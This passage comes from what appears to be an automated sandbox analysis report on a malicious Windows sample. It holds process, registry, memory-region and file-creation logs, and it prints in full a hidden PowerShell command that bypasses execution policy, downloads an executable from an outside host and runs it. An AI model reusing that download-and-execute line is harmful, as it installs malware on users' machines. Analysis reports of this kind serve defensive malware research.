| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
Threads
Thread 0xb74
58
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff653b10000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc72310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc72319180 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc72310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffc7231493c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffc72312d40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffc709c0750 |
|
1 | |
| Environment | Get Environment String | name = ApPDaTa, result_out = C:\Users\5JgHKoaOfdp\AppData\Roaming |
|
1 | |
| Environment | Get Environment String | name = appdaTa, result_out = C:\Users\5JgHKoaOfdp\AppData\Roaming |
|
1 | |
| File | Get Info | filename = powershell.exe, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xb88, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #5: powershell.exe
1252
56
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://telemetry7win.at/merry.rar?SOiJ','C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe'); start-procEss 'C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe' |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb88 |
| Parent PID | 0xb70 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B8C
0x
B98
0x
B9C
0x
B94
0x
5D8
0x
0
0x
804
0x
3A0
0x
5B8
0x
22C
0x
68C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| roamingeox20.exe | 0x00400000 | 0x0043dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000e8904d0000 | 0xe8904d0000 | 0xe8904effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e8904d0000 | 0xe8904d0000 | 0xe8904dffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e8904e0000 | 0xe8904e0000 | 0xe8904e6fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e8904f0000 | 0xe8904f0000 | 0xe8904fefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000e890500000 | 0xe890500000 | 0xe89057ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e890580000 | 0xe890580000 | 0xe890583fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000e890590000 | 0xe890590000 | 0xe890590fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000e8905a0000 | 0xe8905a0000 | 0xe8905a1fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0xe8905b0000 | 0xe89062dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000000e890630000 | 0xe890630000 | 0xe890636fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e890640000 | 0xe890640000 | 0xe890642fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000e890650000 | 0xe890650000 | 0xe890650fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0xe890660000 | 0xe890662fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000000e890670000 | 0xe890670000 | 0xe890670fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e890680000 | 0xe890680000 | 0xe890680fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e890690000 | 0xe890690000 | 0xe89078ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e890790000 | 0xe890790000 | 0xe890917fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000e890920000 | 0xe890920000 | 0xe890926fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e890930000 | 0xe890930000 | 0xe890933fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000e890940000 | 0xe890940000 | 0xe89094ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e890950000 | 0xe890950000 | 0xe890ad0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000e890ae0000 | 0xe890ae0000 | 0xe891edffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000e891ee0000 | 0xe891ee0000 | 0xe891ee6fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e891ef0000 | 0xe891ef0000 | 0xe891ef0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000e891f00000 | 0xe891f00000 | 0xe891f00fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000e891f10000 | 0xe891f10000 | 0xe891f10fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.1.db | 0xe891f20000 | 0xe891f23fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0xe891f20000 | 0xe891f23fff | Memory Mapped File | Readable |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x00000000000000cd.db | 0xe891f30000 | 0xe891f4ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0xe891f30000 | 0xe891f33fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000000e891f40000 | 0xe891f40000 | 0xe891f4ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e891f50000 | 0xe891f50000 | 0xe891f5ffff | Private Memory | - |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000022.db | 0xe891f60000 | 0xe891f7cfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000000e891f80000 | 0xe891f80000 | 0xe891f80fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db | 0xe891f90000 | 0xe891fcefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000000e891fd0000 | 0xe891fd0000 | 0xe891fdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e891fe0000 | 0xe891fe0000 | 0xe89205ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892060000 | 0xe892060000 | 0xe89206ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000e892070000 | 0xe892070000 | 0xe892160fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0xe892170000 | 0xe892444fff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0xe892450000 | 0xe8924d2fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000000e8924e0000 | 0xe8924e0000 | 0xe8928dbfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000e8928e0000 | 0xe8928e0000 | 0xe89295ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892960000 | 0xe892960000 | 0xe892960fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892970000 | 0xe892970000 | 0xe892970fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892980000 | 0xe892980000 | 0xe8929fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892a00000 | 0xe892a00000 | 0xe892a0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892a10000 | 0xe892a10000 | 0xe892a1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892a20000 | 0xe892a20000 | 0xe892a8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892a90000 | 0xe892a90000 | 0xe892b0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892b10000 | 0xe892b10000 | 0xe892b1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892b20000 | 0xe892b20000 | 0xe892b2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892b30000 | 0xe892b30000 | 0xe892b3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892b40000 | 0xe892b40000 | 0xe892b4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e892b50000 | 0xe892b50000 | 0xe892b5ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000e892b60000 | 0xe892b60000 | 0xe8aab5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000e8aab60000 | 0xe8aab60000 | 0xe8aac66fff | Private Memory | Readable, Writable |
|
|
|
- |
| mscorrc.dll | 0xe8aac70000 | 0xe8aacd0fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000000e8aad00000 | 0xe8aad00000 | 0xe8aad0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff7d3cf0000 | 0x7ff7d3cf0000 | 0x7ff7d3cfffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff7d3d00000 | 0x7ff7d3d00000 | 0x7ff7d3d9ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00007ff7d3da0000 | 0x7ff7d3da0000 | 0x7ff7d3e9ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff7d3ea0000 | 0x7ff7d3ea0000 | 0x7ff7d3ec2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00007ff7d3ec5000 | 0x7ff7d3ec5000 | 0x7ff7d3ec6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff7d3ec7000 | 0x7ff7d3ec7000 | 0x7ff7d3ec8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff7d3ec9000 | 0x7ff7d3ec9000 | 0x7ff7d3ecafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff7d3ecb000 | 0x7ff7d3ecb000 | 0x7ff7d3eccfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff7d3ecd000 | 0x7ff7d3ecd000 | 0x7ff7d3ecdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff7d3ece000 | 0x7ff7d3ece000 | 0x7ff7d3ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| powershell.exe | 0x7ff7d4d20000 | 0x7ff7d4d98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc01130000 | 0x7ffc01130000 | 0x7ffc0113ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01140000 | 0x7ffc01140000 | 0x7ffc0114ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01150000 | 0x7ffc01150000 | 0x7ffc011dffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc011e0000 | 0x7ffc011e0000 | 0x7ffc0124ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01250000 | 0x7ffc01250000 | 0x7ffc0125ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01260000 | 0x7ffc01260000 | 0x7ffc0126ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01270000 | 0x7ffc01270000 | 0x7ffc0127ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01280000 | 0x7ffc01280000 | 0x7ffc0128ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01290000 | 0x7ffc01290000 | 0x7ffc0129ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc012a0000 | 0x7ffc012a0000 | 0x7ffc012affff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc012b0000 | 0x7ffc012b0000 | 0x7ffc012bffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc012c0000 | 0x7ffc012c0000 | 0x7ffc012cffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc012d0000 | 0x7ffc012d0000 | 0x7ffc012dffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc012e0000 | 0x7ffc012e0000 | 0x7ffc012effff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc012f0000 | 0x7ffc012f0000 | 0x7ffc012fffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01300000 | 0x7ffc01300000 | 0x7ffc0130ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01310000 | 0x7ffc01310000 | 0x7ffc0131ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01320000 | 0x7ffc01320000 | 0x7ffc0132ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01330000 | 0x7ffc01330000 | 0x7ffc0133ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01340000 | 0x7ffc01340000 | 0x7ffc0134ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffc01350000 | 0x7ffc01350000 | 0x7ffc0135ffff | Private Memory | - |
|
|
|
- |
| system.transactions.dll | 0x7ffc5a380000 | 0x7ffc5a3c8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clrjit.dll | 0x7ffc5a3d0000 | 0x7ffc5a4fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7ffc5a500000 | 0x7ffc5aeaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7ffc5aeb0000 | 0x7ffc5cc15fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7ffc5cc20000 | 0x7ffc5d57cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7ffc5d580000 | 0x7ffc5e1edfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7ffc5e3b0000 | 0x7ffc5e48cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.management.infrastructure.ni.dll | 0x7ffc5e4c0000 | 0x7ffc5e55ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7ffc5e560000 | 0x7ffc5e6c7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7ffc5e6d0000 | 0x7ffc5e85efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.numerics.ni.dll | 0x7ffc5e860000 | 0x7ffc5e88dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7ffc5ea50000 | 0x7ffc5eb01fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7ffc5f020000 | 0x7ffc605acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr120_clr0400.dll | 0x7ffc607f0000 | 0x7ffc608c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clr.dll | 0x7ffc608d0000 | 0x7ffc6124bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7ffc62a70000 | 0x7ffc62b0cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7ffc68dd0000 | 0x7ffc68ddffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x7ffc68ec0000 | 0x7ffc68ecbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x7ffc68ed0000 | 0x7ffc68f81fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7ffc6af90000 | 0x7ffc6aff3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| twinapi.dll | 0x7ffc6b1b0000 | 0x7ffc6b264fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7ffc6cc20000 | 0x7ffc6cc3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x7ffc6cea0000 | 0x7ffc6cecffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7ffc6d0e0000 | 0x7ffc6d0e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7ffc6d3f0000 | 0x7ffc6d554fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcp47langs.dll | 0x7ffc6df70000 | 0x7ffc6dfcdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x7ffc6eef0000 | 0x7ffc6ef8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc6f2b0000 | 0x7ffc6f2b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7ffc6f2d0000 | 0x7ffc6f3f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7ffc6fa70000 | 0x7ffc6faa4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7ffc6fb80000 | 0x7ffc6fb9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7ffc6fe30000 | 0x7ffc6fe4dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x7ffc70060000 | 0x7ffc70085fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x7ffc702f0000 | 0x7ffc70314fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7ffc70350000 | 0x7ffc7037afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc70380000 | 0x7ffc703dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7ffc703e0000 | 0x7ffc703e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7ffc70570000 | 0x7ffc70583fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc706f0000 | 0x7ffc70739fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ffc70970000 | 0x7ffc70a7ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7ffc70a80000 | 0x7ffc70ad0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7ffc70ae0000 | 0x7ffc70b84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7ffc70b90000 | 0x7ffc70c33fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x7ffc70c40000 | 0x7ffc70e15fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7ffc70e20000 | 0x7ffc72236fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7ffc72240000 | 0x7ffc72296fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ffc72310000 | 0x7ffc72449fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7ffc72450000 | 0x7ffc72594fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x7ffc725a0000 | 0x7ffc725a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ffc725b0000 | 0x7ffc72656fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7ffc72660000 | 0x7ffc72693fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7ffc727c0000 | 0x7ffc72993fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7ffc729a0000 | 0x7ffc72b17fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7ffc72b20000 | 0x7ffc72c58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7ffc72c60000 | 0x7ffc72d95fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7ffc72da0000 | 0x7ffc72e56fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x7ffc72e60000 | 0x7ffc72fd0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
|
For performance reasons, the remaining 71 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\5jghkoaofdp\appdata\roamingeox20.exe | 219.50 KB |
MD5:
b045619c51603937bff8f832fb125339
SHA1: 2c8ddc87345e1c52173d9ed19161adbf60efe125 SHA256: 4e21cb59a18a4be27cf9879fdcc40411cd9ec5bc8b4340101d4eed2a3ff82c49 |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\5jghkoaofdp\appdata\local\microsoft\windows\powershell\commandanalysis\powershell_analysiscacheindex | 6.91 KB |
MD5:
e8e6e1b9670f015ff4e0a55a47615496
SHA1: 9f64bbffa5f580d8056edf6bcfebedcace913943 SHA256: 2ba0ac4628e063acc987add7b3107068c6bb8d8bcc2b722132880bd6ba2de898 |
|
|
| c:\users\5jghkoaofdp\appdata\local\microsoft\windows\powershell\commandanalysis\powershell_analysiscacheentry_3d8ab723-44d5-4795-947e-d5b7229dfa98 | 9.00 KB |
MD5:
a15e3bf31a9614ef17d3c33e54536e17
SHA1: 186d1c742c97a503765a44c8ba7236d6561e1228 SHA256: 2af233b36d2216fae1abf43ad7726d871355236517fdbf49367fdb599b168b85 |
|
|
| c:\users\5jghkoaofdp\appdata\local\microsoft\windows\powershell\commandanalysis\powershell_analysiscacheindex | 6.91 KB |
MD5:
de860b30d5a9cc8628f46fff6b2856f0
SHA1: 9b737328f71457b429c981c1ffad5ed964af3840 SHA256: a78a1c9195470cf245ccfe0fe41f7b2b72a49237ce37c7b7feb711bdd2d0d38d |
|
|
Threads
Thread 0xb8c
404
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3 |
|
